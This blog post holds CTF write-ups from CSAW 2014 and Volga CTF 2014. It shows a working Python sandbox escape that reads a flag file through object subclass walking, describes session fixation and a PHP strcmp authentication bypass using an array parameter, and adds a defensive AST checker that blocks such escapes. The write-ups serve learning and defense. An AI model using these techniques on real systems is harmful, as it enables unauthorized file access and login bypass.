Monday, 22 September 2014

CSAW CTF 2014 Quals write-up


As team r00t, we ended up scoring 1250 points. None of the team members worked for more than half a day, and our team is small, with only 3 members. All lazy people :D

Exploitation - 1: bo



This was a simple problem, or else we didn't know how to solve it the way it was meant to be solved.
As usual, as soon as we saw an executable we followed the usual procedure -

First, file type

> file bo
bo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Second, look for strings -

> strings bo

When we looked at the strings... oh wait, is that the flag? Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies


nc 54.165.210.171 12345

Connecting to the server on that port, we found a Python console showing up.
Afterwards we opened the source file.

As we played around with the console, we found:
- It is Python 3.x
- It does not show any returned value.
  Workaround: just print the return value.
- Any error closes the connection.

Time to analyse the source code. All the cool modules and functions were banned :'(

We checked whether there was already a variable named flag or key etc. holding the flag. Obviously it wasn't that easy. So maybe there is a file such as flag.txt or key.txt holding the flag, and we have to open it.

As I had already read a few blog posts about escaping Python sandboxes, it was easy.

Playing around with a tuple, we ended up with an interesting part -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now it's obvious: try opening flag.txt, key.txt etc.

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file:

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}

>>> exit
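The escape above works because the sandbox banned modules and builtins by name while leaving ordinary attribute access alone, so a chain of dunder attribute reads reaches a file type without naming anything on the ban list. As an added example, not part of the write-up or of the challenge's own sandbox code, here is an AST pre-check a console like this one could run before executing a line; the blocked-name set and the safe-builtins whitelist are my own assumptions about what such a console should allow.

```python
from __future__ import annotations
import ast
import builtins

# Assumed ban list: builtins that must not be reachable by name. getattr is
# included because it reaches attributes by string, which the Attribute-node
# check below cannot see.
BLOCKED_NAMES = {
    "open", "exec", "eval", "compile", "__import__", "globals", "locals",
    "vars", "getattr", "setattr", "delattr", "breakpoint", "memoryview",
}
# Assumed whitelist handed to the snippet in place of the real builtins.
SAFE_BUILTINS = {n: getattr(builtins, n)
                 for n in ("print", "len", "range", "sum", "str", "int", "list")}


def find_violations(src: str) -> list[str]:
    """Parse the snippet and list every construct that would let it escape.
    Returns [] when the snippet is allowed to run."""
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]
    problems = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            # ().__class__.__bases__[0].__subclasses__() is a chain of dunder
            # attribute reads; refusing every dunder attribute closes that
            # whole family of object walks, not just this one path.
            if node.attr.startswith("__") and node.attr.endswith("__"):
                problems.append(f"line {node.lineno}: dunder attribute {node.attr!r}")
        elif isinstance(node, ast.Name) and node.id in BLOCKED_NAMES:
            problems.append(f"line {node.lineno}: blocked builtin {node.id!r}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            problems.append(f"line {node.lineno}: import statement")
    return problems


def run_if_clean(src: str) -> list[str]:
    """Console gate: run the snippet under the minimal builtins table only
    when the AST check finds nothing; returns the violation list ([] on success)."""
    problems = find_violations(src)
    if not problems:
        exec(compile(src, "<sandbox>", "exec"), {"__builtins__": SAFE_BUILTINS})
    return problems


if __name__ == "__main__":
    # The write-up's escape (constructed sample input) next to a harmless line.
    escape = "print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())"
    for snippet in (escape, "print(sum(range(10)))"):
        print(snippet, "->", run_if_clean(snippet) or "ran")
```

An AST gate is only one layer: the exec'd code still runs in-process, so a real deployment would pair it with OS-level isolation rather than rely on the name checks alone.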



Thanks for reading through the write-up. If anything is wrong or can be added to this post, please put it in the comments :)


Saturday, 19 July 2014

Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position.

This was one really tough son of a CTF.

Web100-

If the login is successful, you are given a particular PHP session.
Login was easy: you enter a random name, it gets registered, and access is given.

The task was session fixation.

After logging in, in the page source we can see help.php.

In the link field, give the link to your own page where the session id is assigned,

and refresh the logged-in page.

flag: Easy_task_on_Session_Fixation

Comments are welcomed...
Question solving skill: x7r0n

Web200-

Guess they were using the strcmp function on the password.
Change the password parameter to an array.

Response for the above request: [image]

I don't know whether this is how the challenge was meant to be solved, but this shit worked :D

Comments are welcomed :)